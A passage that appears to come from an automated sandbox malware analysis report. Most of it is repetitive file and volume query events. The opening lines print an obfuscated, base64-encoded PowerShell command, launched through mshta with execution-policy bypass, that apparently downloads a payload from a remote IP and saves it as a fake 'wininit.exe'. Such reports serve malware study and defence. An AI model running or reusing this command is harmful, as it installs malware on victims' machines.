c1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\wininit.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
